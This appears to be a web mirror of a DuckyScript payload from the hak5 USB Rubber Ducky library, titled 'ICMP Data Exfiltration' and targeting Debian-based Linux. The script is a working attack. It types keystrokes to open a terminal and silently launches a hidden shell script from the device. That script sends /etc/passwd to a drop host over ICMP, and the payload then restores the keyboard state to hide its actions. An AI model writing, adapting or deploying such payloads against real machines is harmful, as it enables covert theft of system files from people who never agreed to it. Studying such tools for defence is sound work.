Book a Demo!
CoCalc Logo Icon
StoreFeaturesDocsShareSupportNewsAboutPoliciesSign UpSign In
hak5
GitHub Repository: hak5/usbrubberducky-payloads
 Path: blob/master/payloads/library/exfiltration/Lin_ICMP-Data-Exfiltration/payload.txt
2968 views
1
REM TITLE : ICMP Data Exfiltration

2
REM AUTHOR : TW-D

3
REM TARGET : Debian-Based Linux Distributions

4
REM VERSION : 1.0

5
REM CATEGORY : Exfiltration

6
REM REQUIREMENT : DuckyScript 3.0

7


8
ATTACKMODE HID STORAGE

9
DELAY 15000

10


11
REM ---

12
REM USB Rubber Ducky label.

13
REM ---

14
DEFINE #RD_LABEL DUCKY

15


16
REM ---

17
REM Absolute path of the file to be exfiltrated.

18
REM ---

19
DEFINE #TARGET_FILE /etc/passwd

20


21
REM ---

22
REM IP address or domain receiving ICMP packets.

23
REM ---

24
DEFINE #DROP_HOST www.example.com

25


26
SAVE_HOST_KEYBOARD_LOCK_STATE

27


28
IF ( $_CAPSLOCK_ON ) THEN

29
    CAPSLOCK

30
    DELAY 500

31
END_IF

32


33
IF ( $_NUMLOCK_ON == FALSE ) THEN

34
    NUMLOCK

35
    DELAY 500

36
END_IF

37


38
CTRL-ALT t

39
DELAY 2000

40
STRINGLN  nohup "${BASH}" /media/"${USER}"/#RD_LABEL/payload.sh #TARGET_FILE #DROP_HOST &> /dev/null

41
DELAY 1500

42
STRINGLN exit

43


44
RESTORE_HOST_KEYBOARD_LOCK_STATE

45


46